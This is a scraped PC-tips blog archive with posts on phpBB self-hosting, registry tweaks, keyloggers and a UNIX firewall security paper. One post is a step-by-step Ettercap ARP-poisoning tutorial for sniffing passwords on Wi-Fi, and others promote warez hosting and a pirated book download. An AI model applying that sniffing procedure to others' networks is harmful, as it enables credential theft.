PC tips tricks tweaks and hacks

Our New Blog

2010-10-05T16:51:00.002+05:30

We r thankfull to our blog readers for supporting on 300allpctips and hope the same kind of support on our new blog at Tips N Tweaks

the new blog will be having same kind of tips which was in this blog and with it more topics like blogging SEO reviews on games etc.. will be covered

any suggestions regarding our new blog and its topic which will be helpfull for the growth of the site r welcome with open heart

here is the screeenshot of the blog

Running A Board forum From Your Own Pc

2009-07-30T20:48:00.000+05:30

Running A Board forum From Your Own Pc

If you wish to install php and mysql to run a phpBB installation on your computer, first you will need installers. Most of you have windows, so I recommend FoxServ. This is a great program that installs php, mysql, and more on your windows machine in under a minute, excluding download time.

Download foxserv 3.0 from http://www.foxserv.net/

Run the foxserv install program, it is pretty self explanatory, just do what it says.

After you get everything installed, run the foxserv control panel and click the install buttons for everything.

Open winmysql ADMIN. Create a new username and pass at start-up, and then create a new database, the one you will be using for your phpBB installation.

Now download phpBB 2.0.x from phpbb.com, or download phpBBplus from http://www.phpbb2.de/phpbb2plus/phpBB2_plus_1.2.zip.

Unzip the phpBB2 folder into C:\Foxserv\www\

After you have done such, visit http://localhost/phpBB2/ to view your install page. enter the correct information.

database name: the name of the database you created.

database username: username you created

database password: password you created

then enter your email information and everything else as it should be. Now delete the install and contrib directories from the phpBB2 folder on your computer.

Voila! All set up. If you want to have other people view your site, then you need a forwarding service. I have a dynamic IP, so I use http://www.dynu.com. Register an account there and follow all of their instructions if you have a dynamic IP. Now you should visit http://yoursite.dynu.com/ to make sure everything worked.

Also, windows xp users BE SURE TO INSTALL SERVICE PACK 1. SP1 fixes critical incompatibility issues with the apache 2.x server that prevents it from using php correctly. If you do not have service pack one, php pages will load incorrectly or not at all on your webserver.

I posted this because I was fed up with trying to find a host that supports php and mysql and doesnt have any ads on it.

NOTE: You wont get any HOST that will allows you WAREZ, then you can use your own pc as your own HOST

another program that works well is phpdev5 i have used it for a long time. and another site to register a dns name is http://dyndns.org it gives you better names, for example mine is http://shag.kicks-*ss.net.

Adobe Photoshop CS4 For Dummies free download

2009-07-17T20:27:00.000+05:30

This latest version of Photoshop has a few new tricks up its sleeve and Adobe Photoshop CS4 For Dummies will teach you how to use them. From the basics like getting your images into and out of Photoshop to enhancing, cropping, and color correction, it’s all here!

You’ll get all of the basics of digital images and master the importing and exporting of images. You’ll find out how to create easy enhancements like adding shadows and highlights and making color natural, in addition to learning how to use the Adobe camera raw plug-in. Before you know it, you’ll be making beautiful “art” with Photoshop by combining images, precision edges, dressing up images, painting in Photoshop, and using filters. You can even streamline your work in Photoshop using advanced techniques.

Find out how to:

* Import images and use all the tools and processes

* Reduce digital noise, make colors look natural, add highlights and shadows

* Optimize images for print or the Web

* Edit images

* Explore the Painting function and master the daunting Brushes panel

* Add layer styles

* Create on-screen presentations, contact prints, and more

Complete with lists of ten reasons to love your Wacom tablet, ten reasons to own a digital camera, and ten favorite tips and tricks, Adobe CS4For Dummies is your one-stop guide to setting up, working with, and making the most of Photoshop CS4 for all your digital photography needs.

Download here or (Mirror)

Password Sniffing with Ettercap

2009-07-17T20:24:00.004+05:30

Introduction

For those of you who do not know, Ettercap is a network security tool!. It can be used for testing and educational purposes, and it can also be used for quite a few illegal and possibly unethical things. In this guide, I will describe how to sniff passwords over a wi-fi network with this program. It involves using Ettercap to perform ARP-Poisoning. Please understand that this is an educational article. we are not responsible for how you use this information, for any actions you take.

I will be using Linux (Backtrack 4 Beta) for this guide. However, it is nearly the same for all Linux Distros, and probably similar for the Windows version of this program.

Installing and Configuring Ettercap

This is simple enough. If you are on a Debian based system, just open up a terminal and type

CODE :

sudo apt-get install ettercap

CODE :

sudo apt-get install ettercap-gtk

If you are not on Debian, try looking for a package from whatever your distribution is. If you are unable to, head over to

and download the source files and compile them. I'm not sure if they come with the gtk built in, since I've never had to compile them from source before.

Once your installation completes, you need to edit the ettercap's configuration file. It should /etc/etter.conf , however, it may also be in /usr/local/etc/etter.conf.

Find the following lines and uncomment them (Delete the #'s at the start of the line)

# if you use iptables:
redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”
redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport %port -j REDIRECT –to-port %rport”

--Don't uncomment the hash I left in the text--

That's it for configuration and installation. Lets get to the fun part!

Download here (mirror)

Sniffing Passwords with Ettercap

Open up a terminal and type:
CODE :

ettercap -G

You should get something that looks like this:

Now, click on Sniff>Unified Sniffing. A Dialog box will pop open, asking for the wireless interface. Select the one you are using.

You will notice that there are many more options on the top menu bar, for now however, click on hosts>Scan For Hosts. Wait for it to finish.

Now, click on Mitm (Man in the Middle), and select Arp Poisoning, and check the box that says "sniff remote connections". Click ok.

Alright, now, all you need to do is click on start>start sniffing. Go to another computer on your network and head over to some website where credentials are needed (Email, Forums, Facebook,Myspace etc). Log in and you should see your details come up in Ettercap. To stop sniffing, simple click on Start>Stop Sniffing, and Mitm>Stop Mitm attacks.

Please note that there are ways to secure a network against this, and it isn't 100% guaranteed to work 100% of the time. I did this on an unsecured network using the BackTrack 4 Beta, Ettercap, and an Ipod Touch.

Afterword/notes

For some reason, after I end sniffing,my wireless connection is almost always lost. I'm blaming this on the buggy rtl8187 driver, which despite reports of flawless functioning, is continuing to give me grief in certain situations.

Happy Sniffing!

Tips to Trick a Keylogger

2009-07-17T20:01:00.002+05:30

Here is a small step by step procedure which can be used for tricking a keylogger

1) When you need to type a password on a compromised computer, type some portion and use mouse to click on another portion to complete keying in.

2) Avoid entering the full password. Copy and paste from other websites some of the letters or numbers you need.

3) Last but not least, change your password immediately at a secured PC after you use it outside your own computer.

Well.. hopefully these few tricks can fool the poor-programmed keylogger. Anyway, do have an updated antivirus and anti-spyware in check just to be safe.

Verify your Anti Keylogger Software

2009-07-14T18:47:00.006+05:30

In most of the latest security softwares already have the anti keylogger function and we also can find some anti keylogger softwares like Antikeylogger, Keyscramber Personal, Zemana Antilogger, Anti-Keylogger, etc...

Here is a tool using which you can verify the creditibily of these Anti-Keylogger softwares that do they really work as claimed ?

Anti keylogger Tester enables you to test the functionality of anti-keylogger software products by simulating 7 different keystroke capture techniques as well as desktop captures.The 7 keystroke capture techniques are;

1.Getkeystat
2.Getasynckeystat
3.directX
4.Getkeyboardstat
5.Low level keyboard hook
6.Journal record hook
7.Get raw input data

If your anti keylogger software works as advertised, anti keylogger tester should not be able to log any of your keystrokes, otherwise it will inform you and display the captured keystrokes and getting warning wizard as below,

Download anti keylogger tester .

Note :If you do not have any anti keylogger software installed, all keystroke can be captured.

Delete your Recycle Bin

2009-07-14T17:51:00.003+05:30

One thing is for sure, delete option can be added to the recycle bin...
Here we provide the old registry hack which works.

1) Open the Registry Editor.

2) Next open HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder

3)Then to add a rename and delete option, change the Dword attribute to 70 01 00 20

4)Finally refresh & reboot the system.....

done.

Note: Always backup ur data as well as registry before attempting to work on this if u r a newbie....

An Architectural Overview of UNIX Network Security

2009-07-11T19:30:00.001+05:30

Robert B. Reinhardt
breinhar@access.digex.com

ARINC Research Corporation
2551 Riva Road
Annapolis, MD 21401

1. Introduction

The goal of this paper is to present my concept of a UNIX network security architecture based on the Internet connectivity model and Firewall approach to implementing security. This paper defines several layers of a firewall, which depict the layers of vulnerability. This paper also provides some subjective comments on some of the most widely known tools and methods available to protect UNIX networks today, plus a brief discussion of the threat and the risk.

The list of tools and methods that I present in this paper were chosen loosely on the basis of the following: (a) My attempt to find at least one, maybe several examples of a tool or method designed to address a part of the architectural model (some duplication or overlap is accepted); (b) my preference to discuss tools that are well-known and/or part of the public domain (this is not a strict rule, although I did not purposely seek out commercial products); and (c) I hoped to find tools that had a recent paper written by the tools' author, for the reader to use as detailed reference beyond the scope of this document.

Nothing in this paper should be construed as a product endorsement. I apologize in advance to the authors of these tools and methods; since I am only presenting a brief overview, I cannot do justice to a comprehensive description of them. I also apologize to any authors whom I may have left out of this discussion; it was not intentional. The reader should check the availability information that accompanies each tool and obtain additional information prior to proceding with any plans or implementation. Of course, there is no warranty expressed or implied in this paper.

2. Risk, Threat, and Vulnerability

This section presents a general overview of the risk and the threat to the security of your network. These are general statements that apply to almost every network. A complete analysis of your network's risk, threat, and vulnerability should be done in order to assess in detail the requirements of your own network.

2.1 Risk

The risk is the possibility that an intruder may be successful in attempting to access your local-area network via your wide-area network connectivity. There are many possible effects of such an occurence. In general, the possibility exists for someone to:

         READ ACCESS.  Read or copy information from
        your network.

       WRITE ACCESS.  Write to or destroy data on
        your network (including planting trojan
        horses, viruses, and back-doors).

       DENIAL OF SERVICE.  Deny normal use of your
        network resources by consuming all of your
        bandwidth, CPU, or memory.

2.2 Threat

The threat is anyone with the motivation to attempt to gain unauthorized access to your network or anyone with authorized access to your network. Therefore it is possible that the threat can be anyone. Your vulnerability to the threat depends on several factors such as:

         MOTIVATION.  How useful access to or
        destruction of your network might be to
        someone.

       TRUST.  How well you can trust your authorized
        users and/or how well trained are your users
        to understand what is acceptable use of the
        network and what is not acceptable use,
        including the consequences of unacceptable
        use.

2.3 Vulnerability

Vulnerability essentially is a definition of how well protected your network is from someone outside of your network that attempts to gain access to it; and how well protected your network is from someone within your network intentionally or accidently giving away access or otherwise damaging the network.

Motivation and Trust (see Threat, section 2.2) are two parts of this concern that you will need to assess in your own internal audit of security requirements and policy, later I will describe some references that are available to help you start this process.

The rest of this paper is a presentation of my concept of the architectural model of UNIX network security (the focus of this paper). This is geared toward connectivity to the Internet (or Internet Protocol connectivity in general), employing the FIREWALL method of reducing vulnerability to the risks and the threat.

3. UNIX Network Security Architecture

For each of the layers in the UNIX Network Security Architecture (UNIX/NSA) model below, there is a subsection that follows that gives a brief description of that layer and some of the most widely used tools and methods for implementing security controls. I am using the ISO/OSI style of model since most people in the UNIX community are familiar with it. This architecture is specifically based on UNIX Internet connectivity, but it is probably general enough to apply to overall security of any network methodology. One could argue that this model applies to network connectivity in general, with or without the specific focus of UNIX network security.

Layer     Name                Functional Description

LAYER 7   POLICY              POLICY DEFINITION AND DIRECTIVES
LAYER 6   PERSONNEL           PEOPLE WHO USE EQUIPMENT AND DATA
LAYER 5   LAN                 COMPUTER EQUIPMENT AND DATA ASSETS
LAYER 4   INTERNAL-DEMARK     CONCENTRATOR - INTERNAL CONNECT
LAYER 3   GATEWAY             FUNCTIONS FOR OSI 7, 6, 5, 4
LAYER 2   PACKET-FILTER       FUNCTIONS FOR OSI 3, 2, 1
LAYER 1   EXTERNAL-DEMARK     PUBLIC ACCESS - EXTERNAL CONNECT

The specific aim of this model is to illustrate the relationship between the various high and low level functions that collectively comprise a complete security program for wide-area network connectivity. They are layered in this way to depict (a) the FIREWALL method of implementing access controls, and (b) the overall transitive effect of the various layers upon the adjacent layers, lower layers, and the collective model. The following is a general description of the layers and the nature of the relationship between them. After this brief discussion of what each layer is, the next section of this paper will discuss examples of common methods and tools used to implement some of your options at each level, or at least try to tell you where to find out how to get started. Note that there may be some overlap between the definitions of the various levels, this is most likely between the different layers of the FIREWALL itself (layers 2 and 3).

The highest layer [ 7 - POLICY ] is the umbrella that the entirety of your security program is defined in. It is this function that defines the policies of the organization, including the high level definition of acceptable risk down to the low level directive of what and how to implement equipment and procedures at the lower layers. Without a complete, effective, and implemented policy, your security program cannot be complete.

The next layer [ 6 - PERSONNEL ] defines yet another veil within the bigger umbrella covered by layer 7. The people that install, operate, maintain, use, and can have or do otherwise have access to your network (one way or another) are all part of this layer. This can include people that are not in your organization, that you may not have any administrative control over. Your policy regarding personnel should reflect what your expectations are from your overall security program. Once everything is defined, it is imperitive that personnel are trained and are otherwise informed of your policy, including what is and is not considered acceptable use of the system.

The local-area network layer [ 5 - LAN ] defines the equipment and data assets that your security program is there to protect. It also includes some of the monitor and control procedures used to implement part of your security policy. This is the layer at which your security program starts to become automated electronically, within the LAN assets themselves.

The internal demarkation layer [ 4 - INTERNAL DEMARK ] defines the equipment and the point at which you physically connect the LAN to the FIREWALL that provides the buffer zone between your local- area network (LAN) and your wide-area network (WAN) connectivity. This can take many forms such as a network concentrator that homes both a network interface for the FIREWALL and a network interface for the LAN segment. In this case, the concentrator is the internal demarkation point. The minimum requirement for this layer is that you have a single point of disconnect if the need should arise for you to spontaneosly separate your LAN from your WAN for any reason.

The embedded UNIX gateway layer [ 3 - GATEWAY ] defines the entire platform that homes the network interface coming from your internal demark at layer 4 and the network interface going to your packet filtering router (or other connection equipment) at layer 3. The point of the embedded UNIX gateway is to provide FIREWALL services (as transparent to the user or application as possible) for all WAN services. What this really is must be defined in your policy (refer to layer 1) and illustrates how the upper layers overshadow or are transitive to the layers below. It is intended that the UNIX gateway (or server) at this layer will be dedicated to this role and not otherwise used to provide general network resources (other than the FIREWALL services such as proxy FTP, etc.). It is also used to implement monitor and control functions that provide FIREWALL support for the functions that are defined by the four upper ISO/OSI layers (1-Application, 2-Presentation, 3- Session, 4-Transport). Depending on how this and the device in layer 2 is implemented, some of this might be merely pass-thru to the next level. The configuration of layers 3 and 2 should collectively provide sufficient coverage of all 7 of the functions defined by the ISO/OSI model. This does not mean that your FIREWALL has to be capable of supporting everything possible that fits the OSI model. What this does mean is that your FIREWALL should be capable of supporting all of the functions of the OSI model that you have implemented on your LAN/WAN connectivity.

The packet filtering layer [ 2 - FILTER ] defines the platform that homes the network interface coming from your gateway in layer 3 and the network interface or other device such as synchronous or asynchronous serial communication between your FIREWALL and the WAN connectivity at layer 1. This layer should provide both your physical connectivity to layer 1 and the capability to filter inbound and outbound network datagrams (packets) based upon some sort of criteria (what this criteria needs to be is defined in your policy). This is typically done today by a commercial off-the- shelf intelligent router that has these capabilities, but there are other ways to implement this. Obviously there is OSI link-level activity going on at several layers in this model, not exclusively this layer. But, the point is that functionally, your security policy is implemented at this level to protect the overall link- level access to your LAN (or stated more generally; to separate your LAN from your WAN connectivity).

The external demarkation layer [ LAYER 1 ] defines the point at which you connect to a device, telephone circuit, or other media that you do not have direct control over within your organization. Your policy should address this for many reasons such as the nature and quality of the line or service itself and vulnerability to unauthorized access. At this point (or as part of layer 2) you may even deploy yet another device to perform point to point data link encryption. This is not likely to improve the quality of the line, but certainly can reduce your vulnerability to unauthorized access. You also need to be concerned about the dissemination of things at this level that are often considered miscellaneous, such as phone numbers or circuit IDs.Illustration of the UNIX/NSA Model

------------------------------------------------------------------
|                             POLICY                             |
------------------------------------------------------------------
                              |
                              |
---------------------------------------------------
|                   PERSONNEL                     |
---------------------------------------------------
                      |
                      |
---------------------------------
|              LAN              |
---------------------------------
         Enet |
         Enet |
      -----------------
      |  INTERNAL-D   |
      -----------------
         Enet |
         Enet |
-----------------   UNIX server with two Ethernet interfaces and
| GATEWAY-SERVER|   custom software and configuration to implement
-----------------   security policy (proxy services, auditing).
   Enet |
   Enet |
-----------------
| PACKET-FILTER |   cisco IGS router with access lists
-----------------
        X.25 |
             |
      -----------------
      |   EXTERNAL-D  |     leased DID line to WAN service
      -----------------
             |
             |
      + Public Access +

3.1 PUBLIC or NON-PRIVATE CONNECTIVITY

This layer of the model characterizes all external physical connectivity to your network. This normally includes equipment and telephone lines that you do not own or do not have control over. The point of illustrating this is to show this part of the connectivity as part of the overall model. At some point at this layer, equipment that you do own or have control of will connect to the external or public network. Your own policy and implementation must take the dynamics of this connectivity into account.

3.2 ROUTER (FIREWALL PHYSICAL LAYER)

This layer of the model depicts the point at which your physical connectivity and your data stream become one. Without going into hysterics about all of what a router is and does; the point is that at this layer, your electrical connectivity, which contains encapsulated data in some form, becomes information. Your router will decode the electrical signals from the physical connectivity and turn it into packets of encapsulated data for any one of various networking protocols. Within this packet of information is contained the source address, destination address, protocol ID, the datagram itself, etc.

Many routers available today include the capability to create access control lists (ACL) for either one or both of the outgoing and the incoming data interfaces [1][5]. This normally includes the capability to filter out or allow in packets based upon source address, destination address, protocol (such as TCP, UDP, ICMP, etc.) and specific port numbers (TCP and UDP). This provides you the flexibility to design your own network access control policy, enforced at the router, before access to your internal network resources is required or granted. In this way, routers alone are often used to provide the firewall functionality.

While the router ACL capability offers a big advantage, it should not be your only protection because, basically the router only provides protection at the first three levels of the OSI model (Physical, Data Link, and Network layers). The rest of the layers of this firewall model discuss ways to address functional security of the other four OSI layers (Transport, Session, Presentation, and Application).

Availability: I only have personal experience with CISCO routers, however I've been told that Wellfleet and Proteon routers also have this feature. There may be other vendors as well, but they probably all implement it a little differently.

3.3 DUAL-HOMED UNIX GATEWAY SERVER (FIREWALL LOGICAL LAYER)

This layer of the model illustrated the point at which your various IP packets (to and from the router) are used by the network operating system (such as TCP/IP under UNIX) to provide the services identified in the upper four layers of the OSI model. Of course, this UNIX server is actually doing work at the bottom three OSI layers also, in order to communicate with: (a) the router on one side of the server, and (b) the local-area network on the other side of the server.

At this point the router is already implementing your security policy for the bottom three OSI layers, now it's up to your dual- homed [10] UNIX server (acting as a gateway) to implement your security policy relating to functions of the network for the upper four OSI layers. This can mean a lot of things. Depending on what your security policy says you are supposed to enforce, what you do at this point varies. The following tools and methods are example of some of the tools and methods (functionality) available today:

3.3.1 TCP Wrapper

The "TCP WRAPPER" tool [2] provides monitoring and control of network services. Essentially, what happens is that you configure inetd on your dual-homed gateway to run the TCP WRAPPER software whenever certain services (ports) are connected to. Depending on how you configure TCP WRAPPER, it will then LOG information about the connection and then actually start the intended SERVER program that the connection was intended for. Since you have the source to the tool, you can modify it to do more depending on what your needs are. For example, you may want TCP WRAPPER to connect the user to a proxy service instead of the actual program, then have your proxy software handle the transaction in whatever way your security requirements demand.

Availability: This is available from several sources, but to ensure that you get the most recent copy that CERT has verified, you should use anonymous FTP to retrieve it from cert.org in ~/pub/tools/tcp_wrappers/tcp_wrappers.*.

3.3.2 SOCKS library and sockd

The "sockd" and "SOCKS Library" [3] provide another way to implement a "TCP Wrapper." It is not intended to make the system it runs on secure, but rather to centralize ("firewall") all external internet services. The sockd process is started by inetd whenever a connection is requested for certain services, and then only allows connections from approved hosts (listed in a configuration file). The sockd also will LOG information about the connection. You can use the Socks Library to modify the client software to directly utilize the sockd for outgoing connections also, but this is described as very tedious and of course requires you to have the source to those client programs.

Availability: The socks package, which in addition to including both the daemon and the library, has a pre-modified FTP client and finger client; it is available via anonymous FTP from s1.gov in ~/pub as socks.tar.Z. Contact the authors for more information. David Koblas (koblas@netcom.com) or Michelle R. Koblas (mkoblas@nas.nasa.gov).

3.3.3 Kernel_Wrap for SunOS RPC via Shared Libraries

Essentially this is a wrapper for SunOS daemons that use RPC [4], such as portmap, ypserv, ypbind, ypupdated, mountd, pwdauthd, etc. To utilize this, you must have SunOS 4.1 or higher and must have the capability to rebuild your shared libraries (but, you don't need the source to your entire system). Essentially what happens is that you modify the function calls that the kernel uses to establish RPC connections, such as accept(), recvfrom() and recvmsg(). Since these calls are maintained in the shared libraries, you have access to modify them without rewriting the kernel.

Availability: The secured C library package to implement this is available via anonymous FTP from eecs.nwu.edu in ~/pub/securelib.

3.3.4 Swatch

Simple WATCHER [6] is really two things, it is a program used to parse through the myriad of LOG data generated by the various security programs, in particular "syslog." But, it's more than that. It is fully configurable with triggers (actions), so that while it is continuously monitoring the LOG in "real-time," it can take actions based upon certain high-priority events that you tell it to watch for. To get full use of this, you will need to modify your network service daemons such as ftpd and telnetd so that enhanced logging is added to syslog, to feed SWATCH.

Availability: The SWATCH source and documentation is available via anonymous FTP from sierra.stanford.edu in ~/pub/sources.

3.3.5 Controlled Access Point (CAP)

This is more of a method or protocol definition than a specific product. CAP [7] provides a network mechanism intended to reduce the risk of: password guessing, probing for well-known accounts with default passwords, trusted host rlogin, and password capture by network snooping. It is really a design for a variation or enhancement to the general firewall approach to connecting two or more networks. In the paper describing this there is an example of two local nets, one a secure segment with an authentication service, and the other an unsecure segment. Both communicate with each other via a CAP, while there is a router for communication to public networks connected on the unsecure side of the CAP. The CAP is essentially a router with additional functionality to detect incoming connection requests, intercept the user authentication process, and invoke the authentication server.

Availability: Unknown. Contact the authors for more information. J. David Thompson (thompsond@orvb.saic.com) and Kate Arndt (karndt@mitre.org).

3.3.6 Mail Gateway

This is more of a procedure than a software package (although there are packages designed just to do this). I included this to maintain continuity with what I'm trying to illustrate in this paper. This really should be applied to all network services that require external connectivity (meaning any communication over non-private or non-secure channels). In the simplest implementation of this, you configure your router to filter packets so that all mail traffic (SMTP protocol for example) is only allowed to and from one host, the "Mail Gateway." Likewise, your DNS and MTA software will need to be configured for this as well.

3.3.7 Tty Wrapper

This is one of my pet ideas. I have not seen something like this around, and I'll probably never have time to develop it. But, essentially this would be like "TCP Wrapper," only it is designed specifically for serial communications. After that, we will need a "Pseudo-Tty Wrapper," (something more than just filtering out the telnet port) but that is for another day.

3.3.8 HSC-Gatekeeper

The HSC-Gatekeeper from Herve' Schauer Consultants [8], is a complete solution to both layers 1 and 2 of this firewall model. It consists of a thorough firewall methodology and authentication server, providing pass-thru FTP and TELNET services. The author (Herve Schauer) noted that HSC-Gatekeeper is alone to be able to offer fully transparent authentication for these services. I have not had personal experience with HSC's products, so I cannot make a conclusive statement about it other than to comment that the description of it in HSC's paper "An Internet Gatekeeper" (available in the USENIX Proceedings) depicts it (IMHO) as a very comprehensive solution.

Availability: For more information, contact Herve Schauer via e-mail at Herve.Schauer@hsc-sec.fr.

3.3.9 AT&T Inet

Since I discussed HSC's firewall solution, I thought it only fair to mention AT&T's INET Gateway. For a complete description of AT&T's internal solution, you should read Bill Cheswick's paper [9] "The Design of a Secure Internet Gateway." For additional information, contact the author via e-mail at ches@research.att.com. I do not believe that AT&T is in the business of selling this solution to anyone, but the paper describes in good detail how it was done. It should provide the puritan firewaller additional depth to the problems and possible solutions to an Internet firewall approach.

3.4 COMPUTERS ON THE LOCAL-AREA NETWORK

This layer of the model depicts the place where you you are potentially at the greatest risk. The previous layers discussed ways to protect access to this layer of the network. This layer includes all of you local-area network, workstations, file servers, data bases, and other network resources. This is also the point at which your user community sits at their desks and use the network.

There are several things to be concerned about here, access to this layer in the first place notwithstanding. Just because you think you have protected and may be monitoring access to this layer within the previous layers, does not mean that use of computers and other resources within your local-area network should become a free for all. Again, this depends on what you identify in your own particular security policy but, at this layer you should do some routine checking for possible breaches of your firewall that would leave its mark at this layer and pay close attention to effective password handling, etc. This is also the layer of this model at which you want to concern yourself with training your users, after all this is where they can potentially make their mistakes (and harm your network).

3.4.1 Computer Oracle and Password System (COPS)

COPS is a UNIX security status checker. Essentially what it does is check various files and software configurations to see if they have been compromised (edited to plant a trojan horse or back door), and checks to see that files have the appropriate modes and permissions set to maintain the integrity of your security level (make sure that your file permissions don't leave themselves wide open to attack/access).

Many vendors of UNIX are now bundling a security status checker with the OS, usually under the nomenclature of a "C2" or "trusted system." You may still find that this package has more features than your canned package. Compare them.

Additional Comments: The current version of COPS (1.04) makes a limited attempt to detect bugs that are posted in CERT advisories. Also, it has an option to generate a limited script that can correct various security problems that are discovered. Dan also offers a quick hint that should easily get you started using COPS. After you have unarchived the COPS package, perform the following steps: './reconfig', 'make', and './cops -v -s . - b bit_bucket'. -- There is a lot of README documentation included if you need more help.

Availability: COPS can be retrieved via anonymous FTP from cert.org in ~/pub/tools/cops.

3.4.2 Chkacct

Chkacct [11] is a COPS for the ordinary user. This tool is made available to the users to run, or it is run for them once per day. It will do an integrity check on the status of files in their own account and then mail them the results (such as "Dear user: Your .rhosts file is unsafe"). This package can help make your users more aware of security controls and raise their level of participation in the program.

Availability: Chkacct is distributed with the COPS package (>= COPS 1.04), for additional information contact shabby@mentor.cs.purdue.edu.

3.4.3 Crack

Crack helps the security administrator identify weak passwords by checking for various weaknesses and attempting to decrypt them. If Crack can figure out your password, then you must choose a better password. It is very likely that a determined intruder will be able to get the password too (using similar techniques, or the Crack program itself, since it is publicly available).

Availability: Crack is available via anonymous FTP from cert.org in ~/pub/tools/crack/crack_4.1-tar.Z.

3.4.4 Shadow

The shadow password suite of programs [12] replaces the normal password control mechanisms on your system to remove the encrypted password from the publicly readable file /etc/passwd and hides them in a place that only this program has permission to read. It consists of optional, configurable components, provides password aging to force users to change their passwords once in awhile, adds enhanced syslog logging, and can allow users to set passwords up to a length of sixteen characters.

Many vendors of UNIX are now bundling a shadow password suite with the OS, usually under the nomenclature of a "C2" or "trusted system." You may still find that this package has more features than your canned package. Compare them.

Availability: Shadow is available from USENET archives which store the comp.sources.misc newsgroup. Distribution is permitted for all non-commercial purposes. For more information contact the author, John F. Haugh III (jfh@rpp386.cactus.org).

3.4.5 Passwd+

Passwd+ is a proactive password checker [13] that replaces /bin/passwd on your system. It is rule-based and easily configurable. It prevents users from selecting a weak password so that programs like "CRACK" can't guess it, and it provides enhanced syslog logging.

Many vendors of UNIX are now bundling a proactive password checker with the OS, usually under the nomenclature of a "C2" or "trusted system." You may still find that this package has more features than your canned package. Compare them.

Availability: Passwd+ (developed by Matt Bishop) is available via anonymous FTP from dartmouth.edu in ~/pub/passwd+tar.Z.

3.4.6 Audit

Audit is a policy-driven security checker for a heterogeneous environment [14]. It is fully configurable so that you can set up Audit to exactly match your site's security policy. This program functionally does what COPS is intended to do, but does not hard-code your policy decisions for you the way that COPS does.

Many vendors of UNIX are now bundling an auditing subsystem with the OS, usually under the nomenclature of a "C2" or "trusted system." You may still find that this package has more features than your canned package. Compare them. One particular subject to note is that most (IMHO) vendors auditing subsystems only collect and regurgitate tons of raw data, with no guidance and assistance for using that information. They leave that up to you. The Audit and/or Swatch tools are probably better.

Availability: The final version of Audit will eventually be posted to USENET. However, the beta release will only be made available on a limited basis, to larger, heterogeneous sites. If your interested in participating in the beta test, send e-mail to the auther, Bjorn Satdeva (bjorn@sysadmin.com).

3.4.7 Miro

Miro [14] is a suite of tools for specifying and checking security contraints (like COPS and Audit), including a couple programming languages. It is general because it is not tied to any particular OS, and it is flexible because security administrators express site policies via a formal specification language. It is easy to extend or modify a policy by simply augmenting or changing the specification of the current policy.

Availability: Miro is the product of a large research project, and to understand it you need more than the paragraph I've written above. For more information about the Miro project send e-mail to (miro@cs.cmu.edu), there is even a video available. The authors Ph.D thesis, as well as the sources for the Miro tools, are available via anonymous FTP from ftp.cs.cmu.edu. When you connect there, type "cd /afs/cs/project/miro/ftp" and "get ftp-instructions"; this will explain how to get the thesis and/or software.

3.5 ADDITIONAL SECURITY ENHANCEMENTS

The tools described in firewall layers {1...4} (sections 3.1 to 3.4) above, are what I consider part of a "base" set of tools and functional requirements for general security administration. The tools and methods described in this section are additional measures that can be combined with or added to your overall security program at any of the other levels.

3.5.1 One-time Password Key-Card

Since reusable passwords can be captured and used/reused by intruders, consider a "one-time password" scheme. One-time passwords can be implemented using software-only solutions or software/hardware solutions, and there are several commercial products available. The following is an example of what CERT uses. Each user is assigned a "Digital Pathways" key-card (approximately $60 per user). When you enter your PIN code, it supplies a password that is good only one time. The only other piece to this, is software that replace the login shell on your "firewall" server.

Availability: The source-code for this shell is based on code from the key card vendor and is currently not available to the public domain via anonymous FTP. For additional information about this, send e-mail to (cert@cert.org).

3.5.2 Privacy Enhanced Mail (PEM)

PEM is a RSA-based encryption scheme that encrypts sensitive information, but more than that it checks for message integrity and non-repudiation of origin, so that the originator cannot deny having sent the message. PEM is actually a protocol that is designed to allow use of symmetric (private-key) and asymmetric (public-key) cryptography methods. In this example, Trusted Information Systems, Inc. (TIS) has implemented a PEM package using the public-key technique together with the Rand MH Message Handling System (version 6.7.2). TIS/PEM libraries [16] can be adapted for implementation of non-mail applications as well.

Availability: TIS/PEM is a commercially available product, for additional information send e-mail to (pem-info@tis.com).

3.5.3 Kerberos

Kerberos is a DES-based encryption scheme that encrypts sensitive information, such as passwords, sent via the network from client software to the server daemon process. The network services will automatically make requests to the Kerberos server for permission "tickets." You will need to have the source to your client/server programs so that you can use the Kerberos libraries to build new applications. Since Kerberos tickets are cached locally in /tmp, if there is more than one user on a given workstation, then a possibility for a collision exists. Kerberos also relies upon the system time to operate, therefore it should be enhanced in the future to include a secure time server (timed is not appropriate). There are two versions of Kerberos, one for OSF ported by HP, and one BSD-based developed by the author.

Availability: Kerberos is distributed via anonymous FTP from athena-dist.mit.edu in ~/pub/kerberos or ~/pub/kerberos5.

3.5.4 Private-Key Certificates

This is not really a product, but rather a design proposal [17] that is an alternative method to PEM for adding network security to applications such as mail. Simply put, it uses the public-key style of implementation with private-key cryptography. It can be adapted to different types of applications and it is boilerplate so that you can essentially plug-in any encryption algorithm. This is designed so that public-key protocols no longer have to rely on public-key encryption.

Availability: Unknown. For more information, contact Don Davis, at Geer Zolot Assoc., Boston, MA (formerly of Project Athena at MIT). His paper "Network Security via Private-Key Certificates" better describes this techique.

3.5.5 Multilevel Security (MLS)

After you've done everything else (above) to make your network secure, then MLS will probably be one of your next logical steps. That doesn't mean you have to wait until you've done everything else before implementing MLS, it's just (IMHO) that you would be wasting your time to go to the n'th degree before covering the fundamentals. However, if you are just now deciding to which variant of the UNIX operating system to buy, consider buying an MLS variant now. After you configure it to manage your security policy, go back through layers {1...4} to see what you might add to make it more secure in a networked environment. Many UNIX vendors are now shipping or preparing to ship a MLS version. A couple examples that immediately come to mind is SecureWare CMW+ 2.2 (based on A/UX or SCO ODT 1.1) and AT&T USL System V-Release 4-Version 2-Enhanced Security (SVR4.2ES).

For additional information regarding MLS implementations within the Department of Defense (DoD), contact Charles West at (703) 696-1891, Multilevel Security Technology Insertion Program (MLS TIP), Defense Information Systems Agency (DISA).

For additional information regarding SecureWare CMW+, send e-mail to info@sware.com. For additional information regarding AT&T USL SVR4.2ES, send e-mail to fate@usl.com.

3.5.6 File Encryption

